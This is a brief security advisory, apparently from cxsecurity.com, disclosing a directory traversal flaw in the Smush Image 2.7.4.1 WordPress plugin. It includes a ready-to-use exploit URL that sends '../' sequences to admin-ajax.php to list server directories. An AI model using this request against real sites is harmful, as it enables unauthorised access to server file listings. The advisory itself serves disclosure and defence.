WordPress Smush Image 2.7.4.1 Directory Traversal

2017.10.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

Class: File traversal
Remote: Yes
Credit: Ricardo Sanchez

The Smush Image WordPress plugin is prone to a file traversal vulnerability because it fails to sufficiently protect the privacy of folders.

To exploit this issue, follow these steps:

Demo URL: http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx

Confirm: https://wordpress.org/support/topic/file-transversal-bug/#post-9554401



Copyright 2017, cxsecurity.com

 
